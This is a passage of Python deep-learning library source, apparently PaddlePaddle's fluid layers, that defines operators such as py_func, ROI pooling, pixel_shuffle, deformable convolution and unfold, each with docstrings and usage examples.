if x.shape != y.shape:
raise AssertionError("the shape of inputs must be the same!")
result = np.zeros(x.shape, dtype='int32')
for i in range(len(x)):
for j in range(len(x[0])):
result[i][j] = x[i][j] + y[i][j]
return result
def create_tmp_var(name, dtype, shape):
return fluid.default_main_program().current_block().create_var(
name=name, dtype=dtype, shape=shape)
def py_func_demo():
start_program = fluid.default_startup_program()
main_program = fluid.default_main_program()
# Input of the forward function
x = fluid.data(name='x', shape=[2,3], dtype='int32')
y = fluid.data(name='y', shape=[2,3], dtype='int32')
# Output of the forward function, name/dtype/shape must be specified
output = create_tmp_var('output','int32', [3,1])
# Multiple Variable should be passed in the form of tuple(Variale) or list[Variale]
fluid.layers.py_func(func=element_wise_add, x=[x,y], out=output)
exe=fluid.Executor(fluid.CPUPlace())
exe.run(start_program)
# Feed numpy array to main_program
input1 = np.random.randint(1, 10, size=[2,3], dtype='int32')
input2 = np.random.randint(1, 10, size=[2,3], dtype='int32')
out = exe.run(main_program,
feed={'x':input1, 'y':input2},
fetch_list=[output.name])
print("{0} + {1} = {2}".format(input1, input2, out))
py_func_demo()
# Reference output:
# [[5, 9, 9] + [[7, 8, 4] = [array([[12, 17, 13]
# [7, 5, 2]] [1, 3, 3]] [8, 8, 5]], dtype=int32)]
"""
helper = LayerHelper('py_func', **locals())
check_type(x, 'X', (list, tuple, Variable, type(None)), 'py_func')
if x is None:
x = []
elif isinstance(x, Variable):
x = [x]
elif isinstance(x, tuple):
x = list(x)
elif not isinstance(x, (list, tuple, Variable)):
raise TypeError('Input must be Variable/list(Variable)/tuple(Variable)')
check_type(out, 'Out', (list, tuple, Variable, type(None)), 'py_func')
if out is None:
out_list = []
elif isinstance(out, Variable):
out_list = [out]
elif isinstance(out, tuple):
out_list = list(out)
elif isinstance(out, list):
out_list = out
else:
raise TypeError(
'Output must be Variable/list(Variable)/tuple(Variable)')
fwd_func_id = PyFuncRegistry(func).id
bwd_func_id = PyFuncRegistry(
backward_func).id if backward_func is not None else -1
for each_out in out_list:
if len(each_out.shape) == 0:
raise ValueError(
'Output shapes of py_func op should be provided by users manually'
)
backward_skip_vars = set()
if backward_func is not None and skip_vars_in_backward_input is not None:
if isinstance(skip_vars_in_backward_input, Variable):
skip_vars_in_backward_input = [skip_vars_in_backward_input]
fwd_in_out = [v.name for v in x]
fwd_in_out.extend([v.name for v in out_list])
fwd_in_out = set(fwd_in_out)
backward_skip_vars = set()
for v in skip_vars_in_backward_input:
if not v.name in fwd_in_out:
raise ValueError(
'Variable {} is not found in forward inputs and outputs'
.format(v.name))
backward_skip_vars.add(v.name)
helper.append_op(
type='py_func',
inputs={'X': x},
outputs={'Out': out_list},
attrs={
'forward_callable_id': fwd_func_id,
'backward_callable_id': bwd_func_id,
'backward_skip_vars': list(backward_skip_vars)
})
return out
# For debug usage
py_func.registered_func = PyFuncRegistry.registered_func
py_func.registered_func_num = PyFuncRegistry.registered_func_num
@templatedoc()
def psroi_pool(input,
rois,
output_channels,
spatial_scale,
pooled_height,
pooled_width,
name=None):
"""
${comment}
Parameters:
input (Variable): ${x_comment}
rois (Variable): LoDTensor, ROIs (Regions of Interest) to pool over.It should be
a 2-D LoDTensor of shape (num_rois, 4), the lod level
is 1. Given as [[x1, y1, x2, y2], ...], (x1, y1) is
the top left coordinates, and (x2, y2) is the bottom
right coordinates. The data type is the same as `input`
output_channels (int): ${output_channels_comment}
spatial_scale (float): ${spatial_scale_comment} Default: 1.0
pooled_height (int): ${pooled_height_comment} Default: 1
pooled_width (int): ${pooled_width_comment} Default: 1
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_comment}.
Return Type:
Variable
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[100, 490, 28, 28], dtype='float32')
rois = fluid.data(name='rois', shape=[None, 4], lod_level=1, dtype='float32')
pool_out = fluid.layers.psroi_pool(x, rois, 10, 1.0, 7, 7)
"""
helper = LayerHelper('psroi_pool', **locals())
# check attrs
if not isinstance(output_channels, int):
raise TypeError("output_channels must be int type")
if not isinstance(spatial_scale, float):
raise TypeError("spatial_scale must be float type")
if not isinstance(pooled_height, int):
raise TypeError("pooled_height must be int type")
if not isinstance(pooled_width, int):
raise TypeError("pooled_width must be int type")
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='psroi_pool',
inputs={'X': input,
'ROIs': rois},
outputs={'Out': out},
attrs={
'output_channels': output_channels,
'spatial_scale': spatial_scale,
'pooled_height': pooled_height,
'pooled_width': pooled_width
})
return out
@templatedoc()
def prroi_pool(input,
rois,
spatial_scale=1.0,
pooled_height=1,
pooled_width=1,
batch_roi_nums=None,
name=None):
"""
The precise roi pooling implementation for paddle. Reference: https://arxiv.org/pdf/1807.11590.pdf
Args:
input (Variable):The input of precise roi pooliing.The shape of input tensor is
[N,C,H,W]. Where N is batch size,C is number of input channels,H
is height of the feature, and W is the width of the feature.
rois (Variable): ROIs (Regions of Interest) to pool over.It should be
a 2-D LoDTensor or Tensor of shape (num_rois, 4), the lod level
is 1 when it is LoDTensor. The LoD include the rois's batch index
information. If rois is Tensor, its batch index information should
be provided by batch_index.
Given as [[x1, y1, x2, y2], ...], (x1, y1) is
the top left coordinates, and (x2, y2) is the bottom
right coordinates.
spatial_scale (float): Ratio of input feature map height (or width) to raw image height (or width).
Equals the reciprocal of total stride in convolutional layers, Default: 1.0.
pooled_height (integer): The pooled output height. Default: 1.
pooled_width (integer): The pooled output width. Default: 1.
batch_roi_nums (Variable): The number of roi for each image in batch. It
should be 1-D Tensor, with shape [N] and dtype int64,
where N is the batch size. Default: None. Be note: The lod of input should be
empty when batch_roi_nums has values;
name (str, default None): The name of this operation.
Returns:
Variable(Tensor):The shape of the returned Tensor is (N, C, pooled_height, pooled_width), with value type float32,float16. N, C denote batch_size and channels of input respectively.
Examples:
.. code-block:: python
## prroi_pool without batch_roi_num
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[None, 490, 28, 28], dtype='float32')
rois = fluid.data(name='rois', shape=[None, 4], lod_level=1, dtype='float32')
pool_out = fluid.layers.prroi_pool(x, rois, 1.0, 7, 7)
## prroi_pool with batch_roi_num
batchsize=4
x2 = fluid.data(name='x2', shape=[batchsize, 490, 28, 28], dtype='float32')
rois2 = fluid.data(name='rois2', shape=[batchsize, 4], dtype='float32')
batch_rois_num = fluid.data(name='rois_nums', shape=[batchsize], dtype='int64')
pool_out2 = fluid.layers.prroi_pool(x2, rois2, 1.0, 7, 7, batch_roi_nums=batch_rois_num)
"""
helper = LayerHelper('prroi_pool', **locals())
# check attrs
if not isinstance(spatial_scale, float):
raise TypeError("spatial_scale must be float type")
if not isinstance(pooled_height, int):
raise TypeError("pooled_height must be int type")
if not isinstance(pooled_width, int):
raise TypeError("pooled_width must be int type")
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
inputs_op = {'X': input, 'ROIs': rois}
if batch_roi_nums is not None:
inputs_op['BatchRoINums'] = batch_roi_nums
helper.append_op(
type='prroi_pool',
inputs=inputs_op,
outputs={'Out': out},
attrs={
'spatial_scale': spatial_scale,
'pooled_height': pooled_height,
'pooled_width': pooled_width
})
return out
def pixel_shuffle(x, upscale_factor):
"""
This op rearranges elements in a tensor of shape [N, C, H, W]
to a tensor of shape [N, C/r**2, H*r, W*r].
This is useful for implementing efficient sub-pixel convolution
with a stride of 1/r.
Please refer to the paper: `Real-Time Single Image and Video Super-Resolution
Using an Efficient Sub-Pixel Convolutional Neural Network <https://arxiv.org/abs/1609.05158v2>`_ .
by Shi et. al (2016) for more details.
Parameters:
x(Variable): 4-D tensor, the data type should be float32 or float64.
upscale_factor(int): factor to increase spatial resolution.
Returns:
Out(Variable): Reshaped tensor according to the new dimension.
Raises:
ValueError: If the square of upscale_factor cannot divide the channels of input.
Examples:
.. code-block:: python
# declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[2,9,4,4])
output = fluid.layers.pixel_shuffle(x=input, upscale_factor=3)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,9,4,4).astype("float32")
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
# print(output.shape)
# (2L, 1L, 12L, 12L)
"""
helper = LayerHelper("pixel_shuffle", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
if not isinstance(upscale_factor, int):
raise TypeError("upscale factor must be int type")
helper.append_op(
type="pixel_shuffle",
inputs={"X": x},
outputs={"Out": out},
attrs={"upscale_factor": upscale_factor})
return out
def fsp_matrix(x, y):
"""
**FSP matrix op**
This op is used to calculate the flow of solution procedure (FSP) matrix of two 4-D Tensor feature maps.
Given feature map x with shape [x_channel, h, w] and feature map y with shape
[y_channel, h, w], we can get the fsp matrix of x and y in two steps:
1. reshape x into matrix with shape [x_channel, h * w] and reshape and
transpose y into matrix with shape [h * w, y_channel].
2. multiply x and y to get fsp matrix with shape [x_channel, y_channel].
The output is a batch of fsp matrices.
Args:
x (Variable): A 4-D Tensor feature map with shape [batch_size, x_channel, height, width].
A Tensor with type float32, float64.
y (Variable): A 4-D Tensor feature map with shape [batch_size, y_channel, height, width].
The y_channel can be different with the x_channel of Input(X)
while the other dimensions must be the same with Input(X)'s. A Tensor with
type float32, float64.
Returns:
fsp matrix (Variable): The output of FSP op with shape [batch_size, x_channel, y_channel].
The x_channel is the channel of x and the y_channel is the channel of y. A Tensor with
type float32, float64.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32])
feature_map_0 = fluid.layers.conv2d(data, num_filters=2,
filter_size=3)
feature_map_1 = fluid.layers.conv2d(feature_map_0, num_filters=2,
filter_size=1)
loss = fluid.layers.fsp_matrix(feature_map_0, feature_map_1)
"""
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'fsp_matrix')
check_variable_and_dtype(y, 'y', ['float32', 'float64'], 'fsp_matrix')
helper = LayerHelper('fsp_matrix', **locals())
out = helper.create_variable_for_type_inference(dtype=helper.input_dtype(
input_param_name='x'))
helper.append_op(type='fsp', inputs={'X': x, 'Y': y}, outputs={'Out': out})
return out
def continuous_value_model(input, cvm, use_cvm=True):
"""
**continuous_value_model layers**
Now, this OP is used in CTR project to remove or dispose show and click value in :attr:`input`.
:attr:`input` is an embedding vector including show and click value, whose shape is :math:`[N, D]` (N is batch size. D is `2 + embedding dim` ).
Show and click at first two dims of embedding vector D.
If :attr:`use_cvm` is True, it will calculate :math:`log(show)` and :math:`log(click)` , and output shape is :math:`[N, D]` .
If :attr:`use_cvm` is False, it will remove show and click from :attr:`input` , and output shape is :math:`[N, D - 2]` .
:attr:`cvm` is show_click info, whose shape is :math:`[N, 2]` .
Args:
input (Variable): The input variable. A 2-D LoDTensor with shape :math:`[N, D]` , where N is the batch size, D is `2 + the embedding dim` . `lod level = 1` .
A Tensor with type float32, float64.
cvm (Variable): Show and click variable. A 2-D Tensor with shape :math:`[N, 2]` , where N is the batch size, 2 is show and click.
A Tensor with type float32, float64.
use_cvm (bool): Use show_click or not. if use, the output dim is the same as input.
if not use, the output dim is `input dim - 2` (remove show and click)
Returns:
Variable: A 2-D LodTensor with shape :math:`[N, M]` . if :attr:`use_cvm` = True, M is equal to input dim D. if False, M is equal to `D - 2`. \
A Tensor with same type as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name="input", shape=[64, 1], dtype="int64")
label = fluid.data(name="label", shape=[64, 1], dtype="int64")
embed = fluid.layers.embedding(
input=input,
size=[100, 11],
dtype='float32')
ones = fluid.layers.fill_constant_batch_size_like(input=label, shape=[-1, 1], dtype="int64", value=1)
show_clk = fluid.layers.cast(fluid.layers.concat([ones, label], axis=1), dtype='float32')
show_clk.stop_gradient = True
input_with_cvm = fluid.layers.continuous_value_model(embed, show_clk, True)
"""
helper = LayerHelper('cvm', **locals())
out = helper.create_variable(dtype=input.dtype)
helper.append_op(
type='cvm',
inputs={'X': [input],
'CVM': [cvm]},
outputs={'Y': [out]},
attrs={"use_cvm": use_cvm})
return out
def where(condition):
"""
Return an int64 tensor with rank 2, specifying the coordinate of true element in `condition`.
Args:
condition(Variable): A bool tensor with rank at least 1, the data type is bool.
Returns:
Variable, the output data type is int64. : The tensor variable storing a 2-D tensor, which involves all coordinate.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
import numpy as np
# condition is a tensor [True, False, True]
condition = layers.assign(np.array([1, 0, 1], dtype='int32'))
condition = layers.cast(condition, 'bool')
out = layers.where(condition) # [[0], [2]]
# condition is a tensor [[True, False], [False, True]]
condition = layers.assign(np.array([[1, 0], [0, 1]], dtype='int32'))
condition = layers.cast(condition, 'bool')
out = layers.where(condition) # [[0, 0], [1, 1]]
# condition is a tensor [False, False, False]
condition = layers.assign(np.array([0, 0, 0], dtype='int32'))
condition = layers.cast(condition, 'bool')
out = layers.where(condition) # [[]]
"""
check_variable_and_dtype(condition, "condition", ['bool'], "where")
helper = LayerHelper("where_index", **locals())
out = helper.create_variable_for_type_inference(
dtype=core.VarDesc.VarType.INT64)
helper.append_op(
type='where_index',
inputs={'Condition': condition},
outputs={'Out': [out]})
return out
def sign(x):
"""
This OP returns sign of every element in `x`: 1 for positive, -1 for negative and 0 for zero.
Args:
x(Variable|numpy.ndarray): The input variable could be N-D tensor or N-D numpy array, \
the input data type is float32 or float64.
Returns:
Variable, the output data type is the same as input data type. : The output sign tensor with identical shape to input :attr:`x`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# [1.0, 0.0, -1.0]
data = fluid.layers.sign(np.array([3.0, 0.0, -2.0], dtype='float32'))
"""
helper = LayerHelper("sign", **locals())
check_type(x, 'x', (Variable, np.ndarray), 'sign')
if isinstance(x, np.ndarray):
x = assign(x)
check_dtype(x.dtype, 'x', ['float16', 'float32', 'float64'], 'sign')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(type='sign', inputs={'X': [x]}, outputs={'Out': [out]})
return out
def unique(x, dtype='int32'):
"""
**unique**
Return a unique tensor for `x` and an index tensor pointing to this unique tensor.
Args:
x(Variable): A 1-D input tensor.
dtype(np.dtype|core.VarDesc.VarType|str): The type of index tensor: int32, int64.
Returns:
tuple: (out, index). `out` is the unique tensor for `x`, with identical dtype to `x`, and \
`index` is an index tensor pointing to `out`, by which user can recover the original `x` tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle.fluid as fluid
x = fluid.assign(np.array([2, 3, 3, 1, 5, 3], dtype='int32'))
out, index = fluid.layers.unique(x) # out is [2, 3, 1, 5]; index is [0, 1, 1, 2, 3, 1]
"""
check_variable_and_dtype(x, "x", ['float32', 'float64', 'int32', 'int64'],
"unique")
helper = LayerHelper("unique", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
index = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='unique',
inputs={'X': x},
attrs={'dtype': convert_np_dtype_to_dtype_(dtype)},
outputs={'Out': [out],
'Index': [index]})
return out, index
def unique_with_counts(x, dtype='int32'):
"""
This OP return a unique tensor for `x` , and count tensor that the count of unique result in raw input, \
and an index tensor pointing to this unique tensor.
**NOTICE**: This op support the variable type of Tensor only.
Args:
x(Variable): A 1-D input tensor with input shape of :math:`[N]` , the input data type is float32, float64, int32, int64.
dtype(np.dtype|core.VarDesc.VarType|str): The type of count and index tensor, it could be int32, int64. Defalut value is int32.
Returns:
tuple, the variable type in tuple is Tensor, the output :attr:`out` data type is the same as input :attr:`x`, \
and data type of output :attr:`index` and :attr:`count` will be int32 or int64.: The :attr:`out` is unique tensor for input :attr:`x`,\
the data shape is :math:`[K]`, the `K` may be different to the `N` in shape of :attr:`x`. :attr:`index` is an index tensor pointing\
to :attr:`out`, the data shape is :math:`[N]` , the data shape is the same as input :attr:`x`. :attr:`count` is count of unique element in\
the :attr:`x`, the data shape is :math:`[K]`, the data shape is the same as output :attr:`out`.
Examples:
.. code-block:: python
import numpy as np
import paddle.fluid as fluid
x = fluid.layers.assign(np.array([2, 3, 3, 1, 5, 3], dtype='int32'))
out, index, count = fluid.layers.unique_with_counts(x) # out is [2, 3, 1, 5]; index is [0, 1, 1, 2, 3, 1]
# count is [1, 3, 1, 1]
# x.shape=(6,) out.shape=(4,), index.shape=(6,), count.shape=(4,)
"""
check_variable_and_dtype(x, "x", ['float32', 'float64', 'int32', 'int64'],
"unique_with_counts")
if not (dtype == 'int32' or dtype == 'int64'):
raise TypeError(
"Op unique_with_counts, index dtype must be int32 or int64")
if x is None or len(x.shape) != 1:
raise ValueError(
"Op unique_with_counts, x must not be null and size of dim must be 1"
)
helper = LayerHelper("unique_with_counts", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
index = helper.create_variable_for_type_inference(dtype)
count = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='unique_with_counts',
inputs={'X': x},
attrs={'dtype': convert_np_dtype_to_dtype_(dtype)},
outputs={'Out': [out],
'Index': [index],
'Count': [count]})
return out, index, count
def deformable_conv(input,
offset,
mask,
num_filters,
filter_size,
stride=1,
padding=0,
dilation=1,
groups=None,
deformable_groups=None,
im2col_step=None,
param_attr=None,
bias_attr=None,
modulated=True,
name=None):
"""
**Deformable Convolution op**
Compute 2-D deformable convolution on 4-D input.
Given input image x, output feature map y, the deformable convolution operation can be expressed as follow:
Deformable Convolution v2:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k) * \Delta m_k}
Deformable Convolution v1:
.. math::
y(p) = \sum_{k=1}^{K}{w_k * x(p + p_k + \Delta p_k)}
Where :math:`\Delta p_k` and :math:`\Delta m_k` are the learnable offset and modulation scalar for the k-th location,
Which :math:`\Delta m_k` is one in deformable convolution v1. Please refer to `Deformable ConvNets v2: More Deformable, Better Results
<https://arxiv.org/abs/1811.11168v2>`_ and `Deformable Convolutional Networks <https://arxiv.org/abs/1703.06211>`_.
Example:
- Input:
Input shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{out}, C_{in}, H_f, W_f)`
Offset shape: :math:`(N, 2 * deformable\_groups * H_f * H_w, H_{in}, W_{in})`
Mask shape: :math:`(N, deformable\_groups * H_f * H_w, H_{in}, W_{in})`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H_{out}&= \\frac{(H_{in} + 2 * paddings[0] - (dilations[0] * (H_f - 1) + 1))}{strides[0]} + 1 \\\\
W_{out}&= \\frac{(W_{in} + 2 * paddings[1] - (dilations[1] * (W_f - 1) + 1))}{strides[1]} + 1
Args:
input (Variable): The input image with [N, C, H, W] format. A Tensor with type
float32, float64.
offset (Variable): The input coordinate offset of deformable convolution layer.
A Tensor with type float32, float64.
Mask (Variable, Optional): The input mask of deformable convolution layer.
A Tensor with type float32, float64. It should be None when you use
deformable convolution v1.
num_filters(int): The number of filter. It is as same as the output
image channel.
filter_size (int|tuple): The filter size. If filter_size is a tuple,
it must contain two integers, (filter_size_H, filter_size_W).
Otherwise, the filter will be a square.
stride (int|tuple): The stride size. If stride is a tuple, it must
contain two integers, (stride_H, stride_W). Otherwise, the
stride_H = stride_W = stride. Default: stride = 1.
padding (int|tuple): The padding size. If padding is a tuple, it must
contain two integers, (padding_H, padding_W). Otherwise, the
padding_H = padding_W = padding. Default: padding = 0.
dilation (int|tuple): The dilation size. If dilation is a tuple, it must
contain two integers, (dilation_H, dilation_W). Otherwise, the
dilation_H = dilation_W = dilation. Default: dilation = 1.
groups (int): The groups number of the deformable conv layer. According to
grouped convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1.
deformable_groups (int): The number of deformable group partitions.
Default: deformable_groups = 1.
im2col_step (int): Maximum number of images per im2col computation;
The total batch size should be devisable by this value or smaller
than this value; if you face out of memory problem, you can try
to use a smaller value here.
Default: im2col_step = 64.
param_attr (ParamAttr, Optional): The parameter attribute for learnable parameters/weights
of deformable conv. If it is set to None or one attribute of ParamAttr,
deformable conv will create ParamAttr as param_attr.
If the Initializer of the param_attr is not set, the parameter is
initialized with :math:`Normal(0.0, std)`, and the
:math:`std` is :math:`(\\frac{2.0 }{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool, Optional): The parameter attribute for the bias of
deformable conv layer. If it is set to False, no bias will be added
to the output units. If it is set to None or one attribute of ParamAttr, conv2d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
modulated (bool): Make sure which version should be used between v1 and v2, where v2 is \
used while True. Default: True.
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Variable: The tensor variable storing the deformable convolution \
result. A Tensor with type float32, float64.
Raises:
ValueError: If the shapes of input, filter_size, stride, padding and
groups mismatch.
Examples:
.. code-block:: python
#deformable conv v2:
import paddle.fluid as fluid
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = fluid.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = fluid.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
mask = fluid.data(name='mask', shape=[None, deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = fluid.layers.deformable_conv(input=data, offset=offset, mask=mask,
num_filters=2, filter_size=filter_size, padding=1, modulated=True)
#deformable conv v1:
import paddle.fluid as fluid
C_in, H_in, W_in = 3, 32, 32
filter_size, deformable_groups = 3, 1
data = fluid.data(name='data', shape=[None, C_in, H_in, W_in], dtype='float32')
offset = fluid.data(name='offset', shape=[None, 2*deformable_groups*filter_size**2, H_in, W_in], dtype='float32')
out = fluid.layers.deformable_conv(input=data, offset=offset, mask=None,
num_filters=2, filter_size=filter_size, padding=1, modulated=False)
"""
check_variable_and_dtype(input, "input", ['float32', 'float64'],
'deformable_conv')
check_variable_and_dtype(offset, "offset", ['float32', 'float64'],
'deformable_conv')
check_type(mask, 'mask', (Variable, type(None)), 'deformable_conv')
num_channels = input.shape[1]
assert param_attr is not False, "param_attr should not be False here."
helper = LayerHelper('deformable_conv', **locals())
dtype = helper.input_dtype()
if not isinstance(input, Variable):
raise TypeError("Input of deformable_conv must be Variable")
if not isinstance(offset, Variable):
raise TypeError("Input Offset of deformable_conv must be Variable")
if groups is None:
num_filter_channels = num_channels
else:
if num_channels % groups != 0:
raise ValueError("num_channels must be divisible by groups.")
num_filter_channels = num_channels // groups
filter_size = utils.convert_to_list(filter_size, 2, 'filter_size')
stride = utils.convert_to_list(stride, 2, 'stride')
padding = utils.convert_to_list(padding, 2, 'padding')
dilation = utils.convert_to_list(dilation, 2, 'dilation')
input_shape = input.shape
filter_shape = [num_filters, int(num_filter_channels)] + filter_size
def _get_default_param_initializer():
filter_elem_num = filter_size[0] * filter_size[1] * num_channels
std = (2.0 / filter_elem_num)**0.5
return Normal(0.0, std, 0)
filter_param = helper.create_parameter(
attr=helper.param_attr,
shape=filter_shape,
dtype=dtype,
default_initializer=_get_default_param_initializer())
pre_bias = helper.create_variable_for_type_inference(dtype)
if modulated:
helper.append_op(
type='deformable_conv',
inputs={
'Input': input,
'Filter': filter_param,
'Offset': offset,
'Mask': mask,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'deformable_groups': deformable_groups,
'im2col_step': im2col_step,
})
else:
helper.append_op(
type='deformable_conv_v1',
inputs={
'Input': input,
'Filter': filter_param,
'Offset': offset,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'deformable_groups': deformable_groups,
'im2col_step': im2col_step,
})
output = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
return output
def unfold(x, kernel_sizes, strides=1, paddings=0, dilations=1, name=None):
"""
This op returns a col buffer of sliding local blocks of input x, also known
as im2col for batched 2D image tensors. For each block under the convolution filter,
all element will be rearranged as a column. While the convolution filter sliding over
the input feature map, a series of such columns will be formed.
For each input :math:`x` with shape [N, C, H, W], the output shape [N, Cout, Lout]
can be calculated as following.
.. math::
dkernel[0] &= dilations[0] \\times (kernel\_sizes[0] - 1) + 1
dkernel[1] &= dilations[1] \\times (kernel\_sizes[1] - 1) + 1
hout &= \\frac{H + paddings[0] + paddings[2] - dkernel[0]}{strides[0]} + 1
wout &= \\frac{W + paddings[1] + paddings[3] - dkernel[1]}{strides[1]} + 1
Cout &= C \\times kernel\_sizes[0] \\times kernel\_sizes[1]
Lout &= hout \\times wout
Parameters:
x(Varaible): 4-D Tensor, input tensor of format [N, C, H, W],
data type can be float32 or float64
kernel_sizes(int|list): The size of convolution kernel, should be [k_h, k_w]
or an integer k treated as [k, k].
strides(int|list): The strides, should be [stride_h, stride_w]
or an integer stride treated as [sride, stride].
For default, strides will be [1, 1].
paddings(int|list): The paddings of each dimension, should be
[padding_top, padding_left, padding_bottom, padding_right]
or [padding_h, padding_w] or an integer padding.
If [padding_h, padding_w] was given, it will expanded to
[padding_h, padding_w, padding_h, padding_w]. If an integer
padding was given, [padding, padding, padding, padding] will
be used. For default, paddings will be [0, 0, 0, 0]
dilations(int|list): the dilations of convolution kernel, should be
[dilation_h, dilation_w], or an integer dilation treated as
[dilation, dilation]. For default, it will be [1, 1].
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
The tensor variable corresponding to the sliding local blocks.
The output shape is [N, Cout, Lout] as decriabled above.
Cout is the total number of values within each block,
and Lout is the total number of such blocks.
The data type of output is the same as the input :math:`x`
Return Type:
Variable
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name = 'data', shape = [100, 3, 224, 224], dtype = 'float32')
y = fluid.layers.unfold(x, [3, 3], 1, 1, 1)
"""
helper = LayerHelper("unfold", **locals())
assert len(x.shape) == 4, \
"input should be the format of [N, C, H, W]"
if isinstance(kernel_sizes, int):
kernel_sizes = [kernel_sizes, kernel_sizes]
else:
assert isinstance(kernel_sizes, list) and (len(kernel_sizes) == 2), \
"kernel_sizes should either be an integer or a list of two integers"
if isinstance(strides, int):
strides = [strides, strides]
else:
assert isinstance(strides, list) and (len(strides) == 2), \
"strides should either be an integer or a list of two integers"
if isinstance(dilations, int):
dilations = [dilations, dilations]
else:
assert isinstance(dilations, list) and (len(dilations) == 2), \
"dilations should either be an integer or a list of two integers"
if isinstance(paddings, int):
paddings = [paddings] * 4
elif isinstance(paddings, list):
if len(paddings) == 2:
paddings = paddings * 2
elif len(paddings) == 4:
pass
else:
raise ValueError(
"paddings should either be an integer or a list of 2 or 4 integers"
)
else:
raise ValueError(
"Unexpected type of paddings, it should be either an integer or a list"
"of 2 or 4 integers")
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="unfold",
inputs={"X": x},
outputs={"Y": out},
attrs={
"kernel_sizes": kernel_sizes,
"strides": strides,
"paddings": paddings,
"dilations": dilations
})
return out
def deformable_roi_pooling(input,
rois,
trans,
no_trans=False,
spatial_scale=1.0,
group_size=[1, 1],
pooled_height=1,
pooled_width=1,
part_size=None,
sample_per_part=1,
trans_std=0.1,
position_sensitive=False,
name=None):
"""
Deformable ROI Pooling Layer
Performs deformable region-of-interest pooling on inputs. As described
in `Deformable Convolutional Networks <https://arxiv.org/abs/1703.06211>`_, it will get offset for each bin after
roi pooling so that pooling at correct region. Batch_size will change to the number of region bounding boxes after deformable_roi_pooling.
The operation has three steps:
1. Dividing each region proposal into equal-sized sections with the pooled_width and pooled_height.
2. Add offset to pixel in ROI to get new location and the new value which are computed directly through
bilinear interpolation with four nearest pixel.
3. Sample several points in each bin to get average values as output.
Args:
input (Variable):The input of deformable roi pooling and it is tensor which value type is float32. The shape of input is
[N, C, H, W]. Where N is batch size, C is number of input channels,
H is height of the feature, and W is the width of the feature.
rois (Variable): ROIs (Regions of Interest) with type float32 to pool over. It should be
a 2-D LoDTensor of shape (num_rois, 4), and the lod level
is 1. Given as [[x1, y1, x2, y2], ...], (x1, y1) is
the top left coordinates, and (x2, y2) is the bottom
right coordinates, which value type is float32.
trans (Variable): Offset of features on ROIs while pooling which value type is float32. The format is [N, C, H, W], where
N is number of ROIs, C is number of channels, which indicate the offset distance
in the x and y directions, H is pooled height, and W is pooled width.
no_trans (bool): Whether to add offset to get new value or not while roi pooling, which value with type bool is True or False.
If value is True, no offset will be added in operation. Default: False.
spatial_scale (float): Ratio of input feature map height (or width) to raw image height (or width), which value type is float32.
Equals the reciprocal of total stride in convolutional layers, Default: 1.0.
group_size (list|tuple): The number of groups which input channels are divided and the input is list or tuple, which value type is int32. (eg.number of input channels
is k1 * k2 * (C + 1), which k1 and k2 are group width and height and C+1 is number of output
channels.) eg.(4, 6), which 4 is height of group and 6 is width of group. Default: [1, 1].
pooled_height (int): The pooled output height which value type is int32. Default: 1.
pooled_width (int): The pooled output width which value type is int32. Default: 1.
part_size (list|tuple): The height and width of offset which values in list or tuple is int32, eg.(4, 6), which height is 4 and width is 6, and values always equal to pooled_height \
and pooled_width. Default: if None, default value is [pooled_height, pooled_width].
sample_per_part (int): The number of samples in each bin which value type is int32. If value is bigger, it will consume more performance. Default: 1.
trans_std (float): Coefficient of offset which value type is float32. It controls weight of offset. Default: 0.1.
position_sensitive (bool): Whether to choose deformable psroi pooling mode or not, and value type is bool(True or False). If value is False, input dimension equals to output dimension. \
If value is True, input dimension should be output dimension * pooled_height * pooled_width. Default: False.
name (str|None): Name of layer. Default: None.
Returns:
